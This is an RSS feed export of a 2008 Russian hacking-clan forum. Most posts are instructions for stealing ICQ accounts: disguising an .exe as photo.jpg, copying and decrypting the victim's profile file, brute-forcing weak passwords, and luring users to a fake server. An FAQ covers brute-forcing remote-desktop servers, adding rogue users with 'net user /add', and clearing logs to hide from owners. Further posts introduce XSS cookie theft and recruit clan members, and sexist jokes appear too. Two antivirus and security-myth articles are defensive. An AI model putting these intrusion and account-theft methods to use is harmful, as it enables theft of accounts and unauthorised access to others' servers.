						&lt;p&gt;photo.jpg.........................................exe. Только вместо точек пробелы. Дело в том, что когда ламер получает файл и хочет его сохранить, имя файла получается настолько длинное, что видно только photo.jpg (посыл через ICQ). Естественно, если растянуть окно закачки файла, то все будет видно, но я Вас уверяю, что это делает всего 1, максимум 2 процента из 100. Ламер открывает файл и начинает ныть, что у него ничего не открывается. Вы говорите, что понятии не имеете в чем дело и что у Вас все гуд. Потом делаете так: заходите в С:program filesicq, а дальше смотрите сами где находится его dat файл. Если это аська 99b, то в папке Db99, если аська 2000a или 2000b, то в папке 2000. Там лежит файл под названием &#039;номер его аськи.dat&#039;. Закачиваете его к себе и в общем все. Теперь надо его расшифровать. Для этого есть много программ, лучшая из которых на мой взгляд icq information v1.3. Там все будет понятно. Так, взяли пароль, хотя нет, Вы же взяли dat, а знаете что это означает? Весь его контакт лист и хистори будут у Вас (при условии, что у Вас стоит версия более поздняя чем у него, или хотя бы такая же. Если у Вас 99b а у него 2000*, тогда контакт не удастся взять). Регим асю, меняем пароль и сразу же меняем Priamary E-mail на свое мыло, что бы он потом не получил пароль от Мираба (AOL`а) по мылу. И все... &lt;/p&gt;
						&lt;p&gt;VIII. Смекалка. Как вы думаете сколько простаков из 100.000.000 с лишнем пользователей ICQ? Правильно думаете - много. Итак, какие же пароли они используют? Да самые простые и известные, например &#039;qwerty&#039; (первые шесть букв слева направо верхней строчки клавы), а может и чего проще - &#039;12345&#039;. Или насмотревшись фильма &#039;Хакеры&#039; всовывают &#039;God&#039;, &#039;Sex&#039;,&#039;Love&#039;. Но как узнать какой из 100 миллионов юзеров вписывает простой пароль? Это совсе не сложно. Просто ищите юзера у которого Nickname, Lastname и Firstname одинаковое. Допусти 12345 - Nick, 12345 - Lastname и 12345 - Firstname. Скорее всего таких юзеров с ником с именем и фамилией очень много (из них процентов 20 дебилов точно, которые и пароль пишут такой же - 12345). Такие-же действия можно проводить и с &#039;qwerty&#039;, &#039;God&#039;, &#039;Love&#039;, &#039;Sex&#039;, их куча...очень много, все ограничено только Вашей фантазией. При одном заходе можно спереть от 5-20 юинов. Но неужели Вы будете каждый раз в аське пробивать пароли путем &#039;Add another registered user&#039; ..это очень долго. Есть специальные проги, типа - ICQ FORCE. Прога по брутфорсу паролей. &lt;/p&gt;
						&lt;p&gt;IX. Другой порт. По-умолчанию ICQ идет по 5190 порту, который так и называется Mirabilis ICQ. А прикиньте, кто-нить ломанет Мираб, он упадет на недельку, а Вы в это время быстренько делаете мнимый сервак у себя на компе и все подключаются к Вам и все пароли у Вас . Конечно это все в пределах мечтаний, слишком много НО, да и Мираб пока еще не скидывали, хотя сервак (небольшой правда, на пару-тройку асек) создать вполне реально. Для этого нужна спец. прога - ISpyU v0.0.2. Ну так вот, главное, что Вам надо сделать - это запудрить мозги юзеру с которым Вы общаетесь и чей UIN хотите получить. Нужно сделать так, чтобы он поверил что 5190 порт - отстой и переставился на порт, который Вы ему скажете, а на нем уже будет стоять icq server, к которому он и подключится. И пароль у Вас. &lt;/p&gt;
						&lt;p&gt;X. Bruteforce Priamary E-mail. Взлом любого мыла таит в себе большую тонкость. Один из способов взлома - Bruteforce, то есть прямой перебор паролей. Для этого нужны некоторые программы, их много, но я бы посоветовал воспользоваться Brutus AET-2 и XaviorBeta. Проги не простые, скажу сразу, придется разбираться и регистрацию тяжело достать тоже. Но все равно это находка, попробуйте - все работает.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Thu, 30 Oct 2008 14:03:17 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=16#p16</guid>
		</item>
		<item>
			<title>как угнать аську</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=15#p15</link>
			<description>&lt;p&gt;что нужно делать&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mila)</author>
			<pubDate>Thu, 30 Oct 2008 13:54:31 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=15#p15</guid>
		</item>
		<item>
			<title>Открыт набор в CAH</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=14#p14</link>
			<description>&lt;p&gt;CAH - Clan Activ Hacker&lt;br /&gt;Открыт набор в хак группу, в наборе правила только:&lt;br /&gt;1. Желание и ощущение мозгов в голове&lt;br /&gt;2. Не участие в других хак кланах&lt;br /&gt;3. Доверие и дружелюбность к участникам какими бы ламерами оне небыл&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Tue, 21 Oct 2008 22:01:48 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=14#p14</guid>
		</item>
		<item>
			<title>Что такое дедики ?</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=13#p13</link>
			<description>&lt;p&gt;Что такое дедик? &lt;br /&gt;Дедик - очевидно, пошло от английского слова &amp;quot;dedicated&amp;quot;, что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация &lt;br /&gt;служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации. &lt;/p&gt;
						&lt;p&gt;Как подключиться к дедику? &lt;br /&gt;Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск =&amp;gt; Программы =&amp;gt; Стандартные =&amp;gt; Связь =&amp;gt; Подключение к удаленному рабочему столу. Можно еще так: Пуск =&amp;gt; Выполнить =&amp;gt; mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Можно еще Радмином юзать дедик если &lt;br /&gt;он установлен на дедике. &lt;/p&gt;
						&lt;p&gt;На что требуется обращать внимание при выборе дедика? &lt;br /&gt;Канал, Память(RAM), Камень(процессор), ОС. Вот примеры: &lt;br /&gt;Цитата:Intel® Pentium® 4 CPU 2.80GHz, 3.00 GB of RAM\2003 os\1 gb &lt;br /&gt;Intel® Pentium® 4 CPU 3.20GHz, 2.00 GB of RAM\2003 os\100 mb &lt;br /&gt;Intel® Xeon™ CPU 3.06GHz\3.80 GB of RAM\2003 os\100 mb &lt;/p&gt;
						&lt;p&gt;Для чего нужен дедик? &lt;br /&gt;Ну к примеру для брута, флуда, спама icq, мыла. &lt;/p&gt;
						&lt;p&gt;Где достать дедик? &lt;br /&gt;Есть два способа добывание дедика! &lt;br /&gt;1) Это конечно покупка. Хорошие дедики можно купить у de1et-icq#-366055, 0.p.т.i.ђ-icq#-788897. &lt;br /&gt;2) Взлом сервера. &lt;/p&gt;
						&lt;p&gt;Как взломать дедик? &lt;br /&gt;Можно простыми TCP/IP сканерами насканить дедики Значит так, есть такая программа, которую в сети вам найти будет вполне по силам и называется она NTSCAN. Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, &amp;quot;ping from host&amp;quot; - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей). &lt;br /&gt;Еще есть php сканер который написал gemaglabin. Его юзать легко просто даем на съедение ip-адресса, и ждем.(чесно сказать он сейчас пашет или нет но я юзал давно его помог) &lt;br /&gt;Скачать можно от сюда: &lt;br /&gt;.::Скачать::. &lt;/p&gt;
						&lt;p&gt;Не подскашешь какие порты надо сканить? &lt;br /&gt;TCP порты: 3389 - это порт, используемый программой Remote Desktop &lt;br /&gt;Порт 4899, который используется радмином - прогой Remote Administrator. &lt;/p&gt;
						&lt;p&gt;Есть дедик, хочу добавить нового юзера. Как это реализовать? &lt;br /&gt;Пример работы ОС Windows 2000. &lt;br /&gt;Открывай Administrative Tools =&amp;gt; Computer Management =&amp;gt; находим там вкладку Local Users and Groups =&amp;gt; щёлкаем правой кнопкой мыши по вкладке Users =&amp;gt; Create new user. &lt;br /&gt;net user имя_пользователя /add &lt;br /&gt;net start (stop) имя_службы &lt;/p&gt;
						&lt;p&gt;Там веддутся логи, мне нужна прога для очистки логов под OC Windows 2000? &lt;br /&gt;Вот попробуй это: &lt;br /&gt;.::Скачать::. - Запуск через CMD, там же хелп &lt;/p&gt;
						&lt;p&gt;Если дедик ломаный. как шифроватся или что надо делать что бы хозяин не узнал? &lt;br /&gt;clearlogs - юзать после каждого использоввание дедика. НЕ создовать файлы, папки и т.д на робочем столе. Всегда закрывать программы, окна и т.д при выходе. И меньше делать системный ошибок чтобы они не записывались в логах. &lt;/p&gt;
						&lt;p&gt;Купил дедик, пользовалься 2 дня, а на третий немогу подключится, в чем трабла? &lt;br /&gt;Ты просто засветился и твой аккаунт удалил админ, или дедик вырудили из инета. &lt;/p&gt;
						&lt;p&gt;А где можно узнавать диапазоны ip? &lt;br /&gt;wwwproxyserverprivacy.com &lt;/p&gt;
						&lt;p&gt;Чтобы очистить логи надо зайти меню-выполнить-cmd-claerlogs!Всё правильно? &lt;br /&gt;НЕТ, для начало его надо залить на дедик сам clearlogs. Пуск=&amp;gt;Выполнить=&amp;gt;cmd=&amp;gt;cd\=&amp;gt; потом указываешь папку где находиться сам софт=&amp;gt; clearlogs.exe вылелит help . .=&amp;gt; дальше указываешь какие именно логи чистить. &lt;br /&gt;clearlogs - палится как логвайпер. . . hack tool&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Mon, 20 Oct 2008 13:34:10 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=13#p13</guid>
		</item>
		<item>
			<title>Анекдоты</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;Хакер читает внуку сказку:- &amp;quot;...стал он кликать золотую рыбку...&amp;quot;&lt;br /&gt;- Деда, а почему рыбку?&lt;br /&gt;- А потому, дружок, что мышек тогда еще не было. &lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;Падает комп с 16-го этажа и думает: &amp;quot;Вот сейчас бы зависнуть&amp;quot; &lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;Hа днях сyд гоpода Сан-Фpанциско пpиговоpил хакеpа Гойко Митича к десяти годам лишения свободы. Сейчас он yже отбывает наказание в колонии &amp;quot;Пpииск Счастливый&amp;quot; штата Аляска. По данным центpального компьютеpа полиции, завтpа, в 12:00, полностью отбыв сpок наказания, он выходит на свободy.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;Родительское собpание для огpаниченного кpyга лиц (DOOMеp, DOOMеp - младший и диpектоp). Диpектоp: - Я должен с вами побеседовать об амоpальном поведении Вашего сына на пеpеменах. Он только и делает, что бегает за девочками!&lt;br /&gt;DOOMеp: &lt;br /&gt;- ПоDOOMаешь, все ноpмальные паpни в его возpасте бегают за девчонками!&lt;br /&gt;Диpектоp:&lt;br /&gt;- С бензопилой???!!! &lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;Умер Билл Гейтс, предстал перед архангелом Петром. - Ну, что скажешь в свое оправдание? - Сурово спросил Петр, покручивая на пальце ключи от Рая. - Я осчастливил все человечество! - Это как?! - удивился Петр. - Ну, так ведь умер! &lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;10 сходств Призедента РФ и Windows.&lt;br /&gt;- Работают, но потоянно глючат;&lt;br /&gt;- никто не знает чего от них ожидать;&lt;br /&gt;- никому не нравятся, но вынужденны терпеть;&lt;br /&gt;- никто не знает смысл их сообщений;&lt;br /&gt;- имеют друзей по имени Билл;&lt;br /&gt;- ожидаемая смена версий в 2000 году;&lt;br /&gt;- оба имеют кнопку &amp;quot;Пуск&amp;quot; (у одного в чемодане, у второго на рабочем столе).&lt;br /&gt;Но у Windows есть бесспорное приемущество при зависании всегда можно нажать кнопку Reset.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Как определить, что факс отправила блондинка?&lt;br /&gt;- На нем будет почтовая марка. &lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Кто сочиняет анекдоты про блондинок?&lt;br /&gt;- Брюнетки. Одинокими зимними вечерами.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;Идет конкурс красоты. Hа сцене ведущий, блондинка, в зале ее группа поддержки - все сплошные блондинки.&lt;br /&gt;- Итак, последнее задание на интеллект! Сколько будет дважды два?&lt;br /&gt;(после долгих раздумий): - Пять!&lt;br /&gt;- Hеправильно!&lt;br /&gt;- Дайте ей еще шанс!&lt;br /&gt;- Ладно. Сколько будет дважды два?&lt;br /&gt;(после еще более долгих раздумий): - Три?&lt;br /&gt;- Hеправильно!&lt;br /&gt;- Дайте ей еще шанс! Пусть еще раз попробует!&lt;br /&gt;- Ладно. Сколько будет дважды два?&lt;br /&gt;(zzzzz...): - Четыре...&lt;br /&gt;- Дайте ей еще шанс! Пусть попробует еще раз отгадать!&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;Блондинка едет по улице на авто, включает радио и слышит: &lt;br /&gt;&amp;quot;Вы слушаете радио &amp;quot;Европа-плюс&amp;quot; !&amp;quot; &lt;br /&gt;&amp;quot;Господи, и откуда они всё знают?!&amp;quot;- подумала блондинка... &lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;Плывут два крокодила по Нилу разговаривают:&lt;br /&gt;- А я вчера вечером блондинку проглотил. И до того пустая голова у неё была, что я до сих пор погрузиться не могу...&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Почему блондинок хоронят в треугольных гробах?&lt;br /&gt;- Потому, что, когда у них закрываются глаза, сразу раздвигаются ноги!&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Почему блондинки не едят бананы?&lt;br /&gt;- Hе могут найти &amp;quot;молнию&amp;quot;.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Почему блондинки не едят соленые огуpцы?&lt;br /&gt;- Голова в банку не пpолезает.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Почему блондинки не пьют pаствоpимый кофе в пакетиках?&lt;br /&gt;- Hе могут понять, как в такой пакетик влезает две чашки воды.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Как блондинки пpокалывают уши?&lt;br /&gt;- Втыкают кнопки в подплечники.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Что блондинка думает о новом компьютеpе?&lt;br /&gt;- Он ей не нpавится: не ловит 9-й канал.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Какая pазница между блондинкой и компьютеpом?&lt;br /&gt;- Инфоpмацию в компьютеp достаточно ввести только один pаз.&lt;/p&gt;
						&lt;p&gt;******&lt;/p&gt;
						&lt;p&gt;- Почему блондинкам не дают обеденного пеpеpыва?&lt;br /&gt;- Слишком долго учить их заново.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Mon, 20 Oct 2008 13:24:53 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>7 советов по настройке антивирусной защиты.</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;&lt;strong&gt;7 советов по настройке антивирусной защиты.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;7 подарков для вируса.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;1) Административные права в системе.&lt;br /&gt;2) Уязвимые елементы железа и ПО.&lt;br /&gt;3) Беспомощный антивирь.&lt;br /&gt;4) Одинокий антивирь.&lt;br /&gt;5) Старые антивирусные базы.&lt;br /&gt;6) Некорректно настроенный антивирь.&lt;br /&gt;7) Глупый пользователь.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Итак, рассмотрим всё по порядку…&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;Административные права в системе.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Итак, Вы работаете под административной учетной записью, из которой можно без проблем получить приложение с уровнем System (в принципе, что и сделал Ваш антивирус, если он, конечно, установлен)… То же самое может сделать и вирус, при этом, данное повышение прав будет делать не само ядро, которое способен опознать и обезвредить антивирус, а небольшой, скорее всего быстро-мутирующий (т.е. изменяющий себя так, что невозможно объяснить антивирусу что именно нужно ловить), вобщем, быстро-мутирующий загрузчик выполнит вполне легальное действие возведя на уровень антивируса кусок зашифрованного кода… пара преобразований и на уровне System “большая бяка”…&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;99% что лечения Вы не найдёте, также высокий шанс того, что антивирусная система будет выведена из строя, либо вообще не заметит опасности, либо заметит, но вылечить не сможет.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: green&quot;&gt;Для решения проблемы достаточно не сидеть под учеткой с максимальными правами, а создать себе левую учетку. Хотите поиграться, полазить в инете? Для этого Вам не нужны права установки системных служб, а вот для большинства схем атаки сие является главным требованием (я описал довольно старый алгоритм, так что DiE KiDZ).&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;Уязвимые елементы железа и ПО.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Теперь второй вариант получения высоких привилегий - это уязвимости. Причем не только в ПО, но и в железе - разработчики железа и микропрограмм тоже допускают ошибки, которыми не забывают пользоваться.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;Вредоносная программа, локально используя RPC-DCOM получает командную строку от имени системы из-под любой учетки. Дальнейший сценарий печален и описан выше…&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: green&quot;&gt;Обновляем софт, не держим старых версий, следим за уязвимостями ПО и железа, вовремя ставим заплатки и хотфиксы.&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;Беспомощный антивирь.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Да, есть много антивирусных систем, которые имеют часто обновляемые базы, внимательных “лаборантов” и т.п… но… если антивирус не способен защитить сам себя, то что говорить о системе?.. Да, он защитит её от мелкой рыбёшки, но если к Вам попадёт что-нибудь серьёзное или целевое - еще один красный параграф:&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;Вирус, определяя установленную антивирусную систему, сносит её базы, заменяет DNS адреса его серверов обновления на несуществующий хост… Баз нет, обновления начинаются, но новых файлов антивирь не находит. Атака успешна - сушите вёсла…&lt;/span&gt;&lt;br /&gt;Кроме того, антивири, которые отключаются временами… в это время большинство защитных систем отключены… результат - параграфом выше…&lt;br /&gt;&lt;span style=&quot;color: green&quot;&gt;Решение - выбиаем антивири, которые могу за себя постоять - на данный момент лучшей в данном отношении является линейка Касперских. Да, они тормозят, да они тугодумы, но они работают, причем довольно качественно. Опять-таки, стоит учитывать условия - если машина дома без нета - такая защита Вам не нужна, если же инети варез для Вас ролдные слова - решайте - стать ботом-зомби в руках какого-нибудь хакера или сохранить чистый разум и процессорные секунды…&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;Одинокий антивирь.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Защита должна быть комплексной и многосторонней, причем опираться не на одно ядро, как это сделано в KIS… Поставьте отдельно антивирус с функцией файрволла и отдельно файрволл с функцией антивируса. При корректной настройке всё будет работать, в то же время антивирь и файр будут прикрывать друг-друга.&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;Старые антивирусные базы.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Базы антивирусов - это такие “файлики” где хранятся сигнатуры - “лица” вырусов. По ним антивирус узнает - хорошая это программа или плохая… Если честно, то не наю как объяснить доходчивее… Если эти базы не обновлять, антивирус будет распознавать новые вируса, как “незнакомые” лица и пропускать их зелёным коридором…&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;Некорректно настроенный антивирь.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Общий принцип не знаешь - не трогай конфиг!&lt;br /&gt;Довольно часто попадаются машины с отключенной проверкой exe файлов… а ответом служит: “Так он же так быстрее работает!!! “…&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;Глупый пользователь.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Сродни ненастроенному антивирю, только хуже.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;Вася скачал из интернета программу, позволяющую получить ему под коврик мыши моментально 1 000 000 долларов. Внимательно изучив инструкцию, Вася узнал, что свой правильно настроенный соседом Димой антивирус надо отключить… Думаю, дальше всем понятно… А, если не понятно, то это клиника…&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: green&quot;&gt;Да, сейчас разводы, а это был именно развод лохов, поумнее… Вам предложат участие где-нибуть и ненароком поросят ввести пароли доступа в систему под админом или что угодно еще… Запомните - шары не бывает за всё нужно платить.&lt;/span&gt;&lt;br /&gt;А чем заплатите Вы в данном случае?.. Гуглите - Trojan-Proxy или Trijan-Downloader и т.п…&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: silver&quot;&gt;(с) by Korvin-DraGO&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Mon, 20 Oct 2008 13:14:55 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>5 мифов о безопасности</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: maroon&quot;&gt;5 мифов о безопасности.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Разве компьютер, подключенный к Интернету, может быть заражен вирусом, если никакие файлы и сообщения электронной почты не открывались? Это ошибочное представление позволяет вирусописателям легко обманывать пользователей, необоснованно уверенных в безопасности своего ПК. Ниже описано пять подобных мифов.&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;1. Компьютер может быть заражен вирусом только в результате открытия файла или зараженного сообщения электронной почты.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Несколько лет назад это было действительно так. Однако в последнее время появились вирусы, которые применяют сразу несколько способов атак. Они проникают из Интернета через слабые места различных программ, чаще всего Windows и Internet Explorer. Такие вирусы самостоятельно находят в Сети новые жертвы — тех, кто не обновил свое ПО. Например, вирус Gaobot и «черви» Korgo, Blaster и Sasser ловили свои жертвы подобным образом.&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;2. Для защиты компьютера достаточно установить антивирусную программу.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Для обнаружения новых вирусов антивирусной программе должны быть известны их сигнатуры, т.е. отличительные особенности, в связи с чем в ней должно быть настроено регулярное автоматическое обновление. Однако и это не гарантирует полную защиту. Если вы не будете устранять бреши в защите программ путем установки обновлений, могут проявиться даже те вирусы, которые уже были удалены ранее. И для решения других проблем безопасности, таких как попытки вторжения и программы-шпионы, одного антивируса недостаточно. Для предотвращения угроз подобного типа следует установить брандмауэр и программу, блокирующую работу программ-шпионов.&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;3. Можно безо всякого риска открывать сообщения электронной почты от известных адресатов.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Это не так! Большинство вирусов, распространяющихся по электронной почте, используют адресную книгу своей жертвы. В связи с этим при получении электронных сообщений следует быть вдвойне осторожными, даже если они от знакомых. А столкнувшись с электронным сообщением, призывающим удовлетворить ваше любопытство, — как в случае с вирусом Bropia, соблазнявшим эротическими картинками, или вирусом Bobax, предлагавшим фотографии смерти Саддама Хусейна, — немедленно отправляйте его в корзину!&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;4. Попытки вторжения угрожают только тем пользователям, у которых есть высокоскоростное соединение с Интернетом.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Те, кто работает в Интернете с использованием высокоскоростного соединения, действительно больше подвержены угрозам. Они относятся к группе риска не из-за типа соединения, а из-за времени, проводимого в Сети. Пользователи, подолгу работающие с Интернетом по модемному соединению, подвержены точно такой же опасности. Исследования, проведенные компанией Symantec еще в 2002 г., показали следующее: брандмауэр в среднем блокирует 50 попыток вторжения ежедневно.&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;5. На моем компьютере не хранится никакая конфиденциальная информация, поэтому он не представляет интереса для программ-шпионов.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Большинство программ-шпионов собирают не конфиденциальную информацию (такую, как номера банковских карт или пароли), а сведения о действиях и операциях пользователя в Интернете. Регистрируются названия всех посещенных веб-узлов и щелчок на каждой ссылке. Исходя из этой информации пользователю демонстрируется та реклама, которая может его заинтересовать. Такие программы-шпионы, также известные как программы показа рекламы, используют ресурсы системы и замедляют работу компьютера. Если программы были загружены с веб-узлов, предназначенных только для взрослых, то они могут показывать изображения, которые не должны видеть дети. &lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: silver&quot;&gt;security.tsu.ru&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Mon, 20 Oct 2008 12:56:57 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>XSS</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;Привет!!!&lt;br /&gt;В этой теме я хочу детально описать Xss от A до Я.&lt;br /&gt;Так что начнём...&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;========================================&lt;br /&gt;### Xss это Css =&amp;gt; Cross Site Scripting&lt;br /&gt;Чтобы не путать с CSS также назвыают XSS &lt;br /&gt;Впервые этот БАГ появился в 1997.&lt;br /&gt;=======================================&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;### Как используют XSS?&lt;/p&gt;
						&lt;p&gt;Для начала нам нужно знать что такое Cookie. &lt;br /&gt;Если вы знаете, можете пропустить.&lt;/p&gt;
						&lt;p&gt;Cookie служат для сохранения учетных данных сайта на компьютере поситителя.&lt;br /&gt;Если вы зарегестрировались на сайте под ником &#039;blabluble&#039;, то сайт сохранил у вас на компьютере файл с cookies, где закодированы ваши данные.&lt;br /&gt;А если вы есть админ и у вас есть доступ к сайту, а я - юзер, который украл у вас(админа) cookies, то я могу спокойно зайти на сайт, и сайт меня определяет как &#039;admin&#039; - у меня будут администраторские права.&lt;/p&gt;
						&lt;p&gt;Для смены(подстановки украденных) кук советую использувать прогу CookieEdit для IE или встроенные функции в Опере и Фаерфоксе.&lt;/p&gt;
						&lt;p&gt;========================================&lt;br /&gt;Мы разобрались что такое куки идём дальше...&lt;br /&gt;Чтобы перехватить cookies надо найти место на сайте, где можно выполнить XSS-атаку.&lt;/p&gt;
						&lt;p&gt;### Что такое XSS-атака?&lt;/p&gt;
						&lt;p&gt;XSS атаки - это атаки не на сам сайт, а на пользователей сайта. &lt;br /&gt;XSS - это недоработка в фильтре, приложении.&lt;/p&gt;
						&lt;p&gt;Бывают пассивные XSS и активные XSS.&lt;/p&gt;
						&lt;p&gt;Что такое пассивные XSS?&lt;/p&gt;
						&lt;p&gt;Пассивные - это Xss, которые требуют от жертвы непосредственного участия + есть специфические ограничения и сложности. &lt;br /&gt;Поэтому, пассивные XSS не очень ценятся.&lt;br /&gt;Например, нужно заставить её пройти по ядовитой ссылке, что потребует социальной инженерии, хитрости.&lt;/p&gt;
						&lt;p&gt;Активные - это XSS, которые, не требуют никаких дополнительных действий со стороны жертвы - ей достаточно лишь открыть страницу с вашим XSS и ява-код выполнится автоматически. &lt;br /&gt;Благодаря своей автоматизированности - они очень полезны и ценны.&lt;br /&gt;Например, активные хсс существуют в BB-тегах из-за недостаточной фильтрации, когда вы оставляете сообщение на форуме\гостевухе\чате, которое будет всегда активен при каждом обновлении.&lt;/p&gt;
						&lt;p&gt;### Итак, перейду конкретно к тому, как найти на сайте XSS.&lt;/p&gt;
						&lt;p&gt;Как я раньше уже писал что XSS состоит из тегов, они же состоят из html, и javascript языка =).&lt;/p&gt;
						&lt;p&gt;Javascript можно вписывать в html.&lt;br /&gt;Можно кодировать, чтобы обойти фильтры. Но об этом позже.&lt;/p&gt;
